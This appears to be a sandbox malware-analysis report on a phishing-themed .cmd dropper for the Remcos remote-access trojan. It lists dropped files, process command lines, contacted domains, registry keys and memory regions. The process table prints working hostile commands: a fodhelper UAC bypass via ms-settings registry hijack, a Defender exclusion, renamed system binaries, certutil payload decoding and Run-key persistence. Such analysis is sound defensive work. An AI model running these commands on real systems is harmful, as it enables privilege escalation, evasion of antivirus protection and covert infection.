Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Purchase Order is approved26042024.cmd
|
Unicode text, UTF-8 text, with very long lines (3004), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\Public\Kpeyvroh.url
|
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF">), ASCII text, with CRLF line
terminators
|
dropped
|
|
|
|
C:\Users\Public\Libraries\Kpeyvroh
|
data
|
dropped
|
|
|
|
C:\Users\Public\Libraries\Kpeyvroh.PIF
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\Libraries\sppsvc.pif
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\Public\alpha.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\Public\ger.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\Public\kn.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\Public\sppsvc.rtf
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\Public\xkn.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xkn.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdls2d4n.4lb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3ru4bzt.u0w.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 18:56:02 2024, atime=Wed Sep 27 04:28:28
2023, length=1210144, window=hide
|
dropped
|
||
|
Chrome Cache Entry: 100
|
ASCII text, with very long lines (773)
|
downloaded
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 14 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "
|
|
|
|
C:\Windows\System32\extrac32.exe
|
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger
add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden
-Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
|
|
|
|
C:\Users\Public\xkn.exe
|
C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command
/f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "'
; start fodhelper.exe "
|
|
|
|
C:\Users\Public\alpha.exe
|
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ
/d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
|
|
|
|
C:\Users\Public\ger.exe
|
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe
-WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
|
|
|
|
C:\Windows\System32\fodhelper.exe
|
"C:\Windows\system32\fodhelper.exe"
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
|
|
|
|
C:\Windows\System32\extrac32.exe
|
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd"
"C:\\Users\\Public\\sppsvc.rtf" 9
|
|
|
|
C:\Users\Public\kn.exe
|
C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf"
9
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif"
12
|
|
|
|
C:\Users\Public\kn.exe
|
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
|
|
|
|
C:\Users\Public\Libraries\sppsvc.pif
|
C:\Users\Public\Libraries\sppsvc.pif
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
|
|
|
|
C:\Users\Public\alpha.exe
|
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
|
|
|
|
C:\Windows\SysWOW64\extrac32.exe
|
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF
|
|
|
|
C:\Users\Public\Libraries\Kpeyvroh.PIF
|
"C:\Users\Public\Libraries\Kpeyvroh.PIF"
|
|
|
|
C:\Users\Public\Libraries\Kpeyvroh.PIF
|
"C:\Users\Public\Libraries\Kpeyvroh.PIF"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Windows\System32\SystemSettingsAdminFlows.exe
|
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
|
||
|
C:\Windows\System32\taskkill.exe
|
taskkill /F /IM SystemSettings.exe
|
There are 21 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://geoplugin.net/json.gp/C
|
unknown
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
^www.pentegrasystem.com
|
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
|
unknown
|
||
|
https://login.microsoftonline.com/%s/oauth2/authorize
|
unknown
|
||
|
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
|
unknown
|
||
|
http://ocsp.sectigo.com0
|
unknown
|
||
|
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
|
unknown
|
||
|
https://enterpriseregistration.windows.net/EnrollmentServer/key/
|
unknown
|
||
|
https://login.windows.local
|
unknown
|
||
|
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
|
142.250.64.196
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
http://geoplugin.net/json.gpK0r
|
unknown
|
||
|
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
|
142.250.64.196
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop
|
23.35.153.42
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://%ws/%ws_%ws_%ws/service.svc/%ws
|
unknown
|
||
|
https://enterpriseregistration.windows.net/EnrollmentServer/device/
|
unknown
|
||
|
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
|
unknown
|
||
|
http://geoplugin.net/json.gpoft
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://geoplugin.net/json.gpa
|
unknown
|
||
|
https://sectigo.com/CPS0
|
unknown
|
||
|
https://login.microsoftonline.com/%s/oauth2/token
|
unknown
|
||
|
http://geoplugin.net/json.gpthority
|
unknown
|
||
|
http://geoplugin.net/json.gp2BF
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.google.com/async/newtab_promos
|
142.250.64.196
|
||
|
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
|
142.250.64.196
|
||
|
http://geoplugin.net/user
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com/async/ddljson?async=ntp:2
|
142.250.64.196
|
||
|
http://crl.m
|
unknown
|
||
|
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
|
142.250.64.196
|
||
|
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
|
unknown
|
||
|
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.pmail.com
|
unknown
|
||
|
http://ocsp.sectigo.com0C
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
https://drive.usercontent.google.com/6
|
unknown
|
There are 39 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.pentegrasystem.com
|
83.137.157.85
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
www.google.com
|
142.250.64.196
|
||
|
drive.google.com
|
192.178.50.78
|
||
|
drive.usercontent.google.com
|
142.250.217.193
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
83.137.157.85
|
www.pentegrasystem.com
|
Hungary
|
|
|
|
192.168.2.5
|
unknown
|
unknown
|
|
|
|
142.250.64.196
|
www.google.com
|
United States
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
142.250.217.193
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Kpeyvroh
|
|
|
|
HKEY_CURRENT_USER_Classes\ms-settings\shell\open\command
|
NULL
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
|
SlowContextMenuEntries
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7
|
Name
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7
|
Name
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7
|
Name
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-3A6IQD
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-3A6IQD
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-3A6IQD
|
time
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2891000
|
direct allocation
|
page execute and read and write
|
|
|
|
805000
|
heap
|
page read and write
|
|
|
|
7E9A0000
|
direct allocation
|
page read and write
|
|
|
|
29A0000
|
direct allocation
|
page execute and read and write
|
|
|
|
24A6000
|
direct allocation
|
page read and write
|
|
|
|
7FBA0000
|
direct allocation
|
page read and write
|
|
|
|
81A000
|
heap
|
page read and write
|
|
|
|
76D000
|
heap
|
page read and write
|
|
|
|
21060000
|
direct allocation
|
page execute and read and write
|
|
|
|
80B000
|
heap
|
page read and write
|
|
|
|
2841000
|
direct allocation
|
page execute and read and write
|
|
|
|
1B7CF000
|
stack
|
page read and write
|
|
|
|
67A000
|
heap
|
page read and write
|
|
|
|
801000
|
heap
|
page read and write
|
|
|
|
810000
|
heap
|
page read and write
|
|
|
|
823000
|
heap
|
page read and write
|
|
|
|
7EFA0000
|
direct allocation
|
page read and write
|
||
|
2842709C000
|
heap
|
page read and write
|
||
|
20B7E000
|
stack
|
page read and write
|
||
|
7FA30000
|
direct allocation
|
page read and write
|
||
|
7EF20000
|
direct allocation
|
page read and write
|
||
|
284270BC000
|
heap
|
page read and write
|
||
|
339AF000
|
stack
|
page read and write
|
||
|
1FD240C0000
|
heap
|
page read and write
|
||
|
1A97E000
|
stack
|
page read and write
|
||
|
7EB00000
|
direct allocation
|
page read and write
|
||
|
215EF138000
|
heap
|
page read and write
|
||
|
83C000
|
heap
|
page read and write
|
||
|
30EB87E000
|
stack
|
page read and write
|
||
|
1E50ACFE000
|
heap
|
page read and write
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
1A0BF42C000
|
heap
|
page read and write
|
||
|
304D35B000
|
stack
|
page read and write
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
7A1000
|
heap
|
page read and write
|
||
|
30EBCBB000
|
stack
|
page read and write
|
||
|
7FCC0000
|
direct allocation
|
page read and write
|
||
|
1FD2273B000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
7F0E0000
|
direct allocation
|
page read and write
|
||
|
15A30EF0000
|
trusted library allocation
|
page read and write
|
||
|
15A34215000
|
trusted library allocation
|
page read and write
|
||
|
7EF10000
|
direct allocation
|
page read and write
|
||
|
28427086000
|
heap
|
page read and write
|
||
|
1C600810000
|
heap
|
page read and write
|
||
|
284270B8000
|
heap
|
page read and write
|
||
|
2A4C84C5000
|
heap
|
page read and write
|
||
|
28427240000
|
heap
|
page read and write
|
||
|
2453000
|
heap
|
page read and write
|
||
|
30EB2C3000
|
stack
|
page read and write
|
||
|
BEB199E000
|
stack
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
20F1E000
|
stack
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A71D000
|
direct allocation
|
page read and write
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
2BF6F490000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
215EF138000
|
heap
|
page read and write
|
||
|
74B000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
284270B4000
|
heap
|
page read and write
|
||
|
7DC000
|
heap
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
17C1ED27000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
22C67470000
|
heap
|
page read and write
|
||
|
B90000
|
heap
|
page read and write
|
||
|
652000
|
heap
|
page read and write
|
||
|
C1CFAFF000
|
stack
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
7F03F000
|
direct allocation
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
28428D00000
|
heap
|
page read and write
|
||
|
265FDB50000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
293023E0000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
|
BEB189B000
|
stack
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
15A3468F000
|
trusted library allocation
|
page read and write
|
||
|
1C6B9150000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
1A0BF3C0000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
15E7DFC0000
|
heap
|
page read and write
|
||
|
55A000
|
unkown
|
page read and write
|
||
|
22D0000
|
direct allocation
|
page read and write
|
||
|
2450000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
30EB77C000
|
stack
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
207B1000
|
direct allocation
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
265FF5D3000
|
heap
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
15A30F37000
|
heap
|
page execute and read and write
|
||
|
45A000
|
unkown
|
page read and write
|
||
|
1A0BF448000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
D3B9FF000
|
stack
|
page read and write
|
||
|
7FF789C09000
|
unkown
|
page read and write
|
||
|
1E508890000
|
heap
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
7F150000
|
direct allocation
|
page read and write
|
||
|
353C87E000
|
stack
|
page read and write
|
||
|
1C10F880000
|
heap
|
page read and write
|
||
|
2323000
|
direct allocation
|
page read and write
|
||
|
15A4AED0000
|
heap
|
page read and write
|
||
|
7EBBF000
|
direct allocation
|
page read and write
|
||
|
1FD2275B000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
7BB000
|
heap
|
page read and write
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
2105F000
|
stack
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
1F831CA7000
|
heap
|
page read and write
|
||
|
30EBDBB000
|
stack
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
7748AFC000
|
stack
|
page read and write
|
||
|
7BF000
|
heap
|
page read and write
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
1FB5C900000
|
heap
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
7F0E0000
|
direct allocation
|
page read and write
|
||
|
1B699000
|
heap
|
page read and write
|
||
|
7FF703A06000
|
unkown
|
page read and write
|
||
|
7FF655880000
|
unkown
|
page readonly
|
||
|
20786000
|
direct allocation
|
page read and write
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
1730D090000
|
heap
|
page read and write
|
||
|
1AE7D000
|
stack
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
15E7E045000
|
heap
|
page read and write
|
||
|
7CB000
|
heap
|
page read and write
|
||
|
20CCE000
|
stack
|
page read and write
|
||
|
5EC9CC000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2859C7C000
|
stack
|
page read and write
|
||
|
2BF6F764000
|
heap
|
page read and write
|
||
|
7FBE5000
|
direct allocation
|
page read and write
|
||
|
30EB3CE000
|
stack
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
1B6BD000
|
heap
|
page read and write
|
||
|
2BF6F410000
|
heap
|
page read and write
|
||
|
56A000
|
unkown
|
page readonly
|
||
|
22C65439000
|
heap
|
page read and write
|
||
|
1A0BF7B5000
|
heap
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
1A0BF445000
|
heap
|
page read and write
|
||
|
22C67456000
|
heap
|
page read and write
|
||
|
2A4C8555000
|
heap
|
page read and write
|
||
|
17C1EECC000
|
heap
|
page read and write
|
||
|
7FF67DFC8000
|
unkown
|
page readonly
|
||
|
8FF000
|
stack
|
page read and write
|
||
|
7F360000
|
direct allocation
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
1D51A240000
|
heap
|
page read and write
|
||
|
563000
|
unkown
|
page readonly
|
||
|
7F0D0000
|
direct allocation
|
page read and write
|
||
|
1B660000
|
heap
|
page read and write
|
||
|
22C65370000
|
heap
|
page read and write
|
||
|
7FF67DFAA000
|
unkown
|
page write copy
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
19D000
|
stack
|
page read and write
|
||
|
1C600AB0000
|
heap
|
page read and write
|
||
|
17C1ED1B000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
22C2000
|
direct allocation
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
7FF67DFB4000
|
unkown
|
page write copy
|
||
|
353C55C000
|
stack
|
page read and write
|
||
|
1F1FAFD0000
|
heap
|
page read and write
|
||
|
230A000
|
direct allocation
|
page read and write
|
||
|
46263FF000
|
stack
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
284270BC000
|
heap
|
page read and write
|
||
|
1FB5C904000
|
heap
|
page read and write
|
||
|
1FD2275B000
|
heap
|
page read and write
|
||
|
7F19F000
|
direct allocation
|
page read and write
|
||
|
729C7FF000
|
stack
|
page read and write
|
||
|
2314000
|
direct allocation
|
page read and write
|
||
|
17C1ED17000
|
heap
|
page read and write
|
||
|
1F1FAFB0000
|
heap
|
page read and write
|
||
|
22C653A0000
|
heap
|
page read and write
|
||
|
7F28F000
|
direct allocation
|
page read and write
|
||
|
265FDB66000
|
heap
|
page read and write
|
||
|
23DC000
|
stack
|
page read and write
|
||
|
1A6E3000
|
direct allocation
|
page read and write
|
||
|
28CA000
|
direct allocation
|
page execute and read and write
|
||
|
1AFEF000
|
direct allocation
|
page execute and read and write
|
||
|
7C3000
|
heap
|
page read and write
|
||
|
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
1F1FB049000
|
heap
|
page read and write
|
||
|
1E5087A0000
|
heap
|
page read and write
|
||
|
6AE000
|
stack
|
page read and write
|
||
|
1E5089E0000
|
heap
|
page read and write
|
||
|
7FF789C09000
|
unkown
|
page read and write
|
||
|
17C1EE60000
|
heap
|
page read and write
|
||
|
24E4000
|
direct allocation
|
page read and write
|
||
|
7FF67DFB3000
|
unkown
|
page read and write
|
||
|
5ECDFF000
|
stack
|
page read and write
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
1E508899000
|
heap
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
7F1F0000
|
direct allocation
|
page read and write
|
||
|
7FF67DF4E000
|
unkown
|
page readonly
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1BA1B000
|
direct allocation
|
page execute and read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
7FF6558D4000
|
unkown
|
page readonly
|
||
|
265FDB9B000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
45A000
|
unkown
|
page write copy
|
||
|
22C65260000
|
heap
|
page read and write
|
||
|
1E50A706000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
1FD24600000
|
trusted library allocation
|
page read and write
|
||
|
2BF6F4B8000
|
heap
|
page read and write
|
||
|
2BFE000
|
stack
|
page read and write
|
||
|
1C6008E0000
|
heap
|
page read and write
|
||
|
838000
|
heap
|
page read and write
|
||
|
1C10F895000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
17C1ED49000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
1C600730000
|
heap
|
page read and write
|
||
|
28427400000
|
heap
|
page read and write
|
||
|
1B6B4000
|
heap
|
page read and write
|
||
|
CD0027C000
|
stack
|
page read and write
|
||
|
13AD5AB000
|
stack
|
page read and write
|
||
|
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FC7F000
|
direct allocation
|
page read and write
|
